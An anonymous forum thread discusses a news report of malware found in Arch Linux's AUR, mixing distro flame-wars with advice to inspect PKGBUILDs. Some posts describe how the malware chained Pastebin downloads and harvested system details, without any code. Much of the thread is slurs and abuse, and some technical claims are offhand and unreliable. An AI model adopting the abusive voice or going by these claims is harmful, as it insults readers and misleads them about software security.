>The Arch Linux user-maintained software repository called AUR has been found to host malware. The discovery was made after a change in one of the package installation instructions was made. This is yet another incident that showcases that Linux users should not explicitly trust user-controlled repositories.
sensorstechforum.com
@
HAHAHAHAHAHAHAHAHAH! ARCHFATS ON SUICIDE WATCH!
Other urls found in this thread:
aur.archlinux.org
txdot.gov
twitter.com
Meh. I've been saying this for years: Arch is just a meme.
This widely known, even the Wiki says to carefully inspect the things you get from the AUR. Bigger AUR packages are safe though. It's really the packages from the bottom that you gotta look out from.
Packages can be provided by anyone which is why you check that URLs in the PKGBUILD file match the official sources before running it.
I thought linux is immune to viruses?
The AUR isn't maintained by arch developers. They are user created install scripts.
Arch is a fucking shitshow.
Most anons who talk about it being minimalist don't even know how the packages and dependencies in there work hence why they think its "small".
Only meme masters trying to join some sort of PC masterrace subgroup and weeb NEETs use it.
That is an oversimplification. There is no reason malicious software can't be made for Linux systems. AUR is literally the equivalent of running random .bat and .exe files from the internet.
The fact it was found and publicly announced is more reason to use it as it's proven that it is in fact checked. Only a retard would blindly install packages without first quickly checking anyway.
Its better to use something with a flaw that's been fixed so you know what happen when shit goes down rather than something that can pretend to be perfect.
not all malware are viruses, virus is just a kind in the group
also there are viruses for linux, but they are very hard to run and not to notice, unless you are not a brainlet running your everyday desktop with root
Arch fags BTFO! AUR = Arch malware repository
Just a threadly reminder.
I don't use arch but they fucking warn you on the front page. I'm literally drowning in summerfag teir threads and post
Haiku got uneditable, signed packages with easily cross-checkable recipes for most of the stuffs, you guys cucking yourselves.
>Martin graduated with a degree in Publishing from Sofia University. As a cyber security enthusiast he enjoys writing about the latest threats and mechanisms of intrusion.
*snap*
Anyway, who the fuck doesn't check the PKGBUILDs.
I literally have my own package manager for AUR written in bash and I'm a fucking welder.
aur is a meme and only a fool would take it seriously
>using aur for pkgbuilds
>not just compiling it yourself
nobody that actually knows what they are talking about has ever said that linux doesn't get viruses.
Based OpenBSD poster
Lmao, poor archfags. That's why I stick with windows 10
im not afraid to admit that i am not on that level of knowledge where i am able to clone software from git and compile it myself(maybe i am but i don't feel need to do so).
most of software i use are in main repos
It wasn't a virus, it was a shell script that wgets another shell script from Pastebin, which wgets another.Whoever did it was a retard, so I'm guessing it was somebody here.
Only non-users and retards ever took the minimalist thing to mean small, as in size. It's always meant "minimal" as in, the devs leave packages as they come from upstream. Faggot ricers were the illiterate cancer who pushed the crap you're talking about.
i bet you couldn't even install it
>Lmao, poor archfags.
You surely mean the probable 3-4 people who actually were pleb enough to install an Adobe reader application.
>that's why i stick with an os which has a million times more malware
dumb boomerposter
cringe
Actually what's in the aur is plain text scripts for downloading and building packages. Just read the fucking things. exe's are binary blobs.
Im sorry for bullying you user-kun
>open source contribution community
>everyone giving in programs they want
well no shit there's gonna be some forms of malware, but that doesn't mean it's all bad. install common sense 2012 pro
not all malware is viruses, and nothing is "immune" to getting cracked. it's the same mentality people have when people say "macs are immune to viruses".
people use arch because they want the customization of gentoo but don't like either A) installing gentoo, or B) compiling everything from source.
cuck
i bet you think ubuntu is a respectable distro
what more customisation do you get out of arch than you do out of a minimal ubuntu installation?
AUR has nothing to do with Arch linux
it's packages by users for users
Arch Devs only support the official repos, learn the difference
what distro is that
Really depends what you pick from the ARU faggot
All you have to do is choose, your complaint is invalid
Minimal ubuntu is just barebones Debian, baka at your commment
blowfish os
better package selection/optimization
the average ubuntu user
>bloated packages are good
ok then
what more customisation do you get out of arch than you do out of a minimal debian installation?
i don't know what you mean.
ubuntu splits packages into smaller pieces, such as including dev headers etc. in seperate packages
if anything, arch allows less customisation
what do you mean by optimisation? arch is no better optimised than ubuntu
You realize Arch packages are every bit as bloated (even moreso actually) than Ubuntu ones right? They try to include support for every build option that's reasonable to support as well as including the development headers (which Ubuntu splits)
ahmed?
>Archtards defending their linux abortion package manager.
>The investigation reveals that the executed scripts included a data harvesting component that retrieves the following information:
> Machine ID
> The output of uname
> CPU Information
> Pacman (package management utility) Information
> The output of systemctl list-units
What's the point??
>aur.archlinux.org
> The script, however, contains a typo (calling $uploader when the function was actually upload()) so shouldn't actually do anything.
It's literally a fucking kid
Breaking news, Arch is shit.
theres documents that can only be opened in acroread. see the horror yourself here.
txdot.gov
I fell for this fuckin meme, ive installed it as main OS, i want to kms, should i return to debian? Fuck ive tried to install it, but it doesnt detect the usb drive, ("cdrom")
I recently left it for Opensuse because I got sick of everything breaking. hey you are was the only reason I used it and that was because it let me get game emulators and roguelikes easily until I found out that much of the community does a bad job packaging them anyway.
>muh updates
bleeding edge distros are a disaster
rolling release distros aren't better
TOP KEK
your post is completely unrelated
what a surprise
If you installed Acrobat Reader in the first place, you're probably retarded.
How do you check for viruses/malware in packages then? Do you use software to scan it like with Windows? I've only been using Linux a couple months and distros where I don't have to worry about this kinda thing at that.
I always read the entire pkgbuild and verify that the source points at the right upstream. Found one today that had a different upstream actually but it turns out it just redirects to the real upstream (mosh-git btw)
I never trust AUR. It's just a tool and allows me to be lazy.
for you
I always see a fat man when I look at that logo now.
/thread
just read each PKGBUILD before installing anything, I guess this is too hard for manjaro retards though
Minimal ubuntu is buggy garbage same as debian
NEVER NOT make use of the provided live cds
Hahaha Archfaggots going on about their superiority BTFO
I always see a fucking pedo faggot cocksucker attention whore when I look at dumb animeposter.
back 2 plebbit newfag
Yeah, it's called systemD.
it is always summer here
t. animeposter
nobody makes malware for linux because nobody worth infecting uses linux
it's all neckbeards running anime apps and thinking their leet hackers because they typed words into a black window instead of clicking things with their mouse
this
But everyone knows this, it is literally a user-operated repository. Anyone could upload a virus if they wanted to, you download things as carefully as you would anywhere else. How dumb are you ?
>nobody worth infecting uses linux
i'm still mad at freenas for going with freebsd instead of debian or anything that's from linux
If digits then gonna install openbsd
IT'S OVER
INSTALLING WINDOWS RIGHT NOW
>using aur for pkgbuilds
>not just compiling it yourself
Hey, someone wrote a script that spits out a pacman package that you can manage like any other software. Why not use it?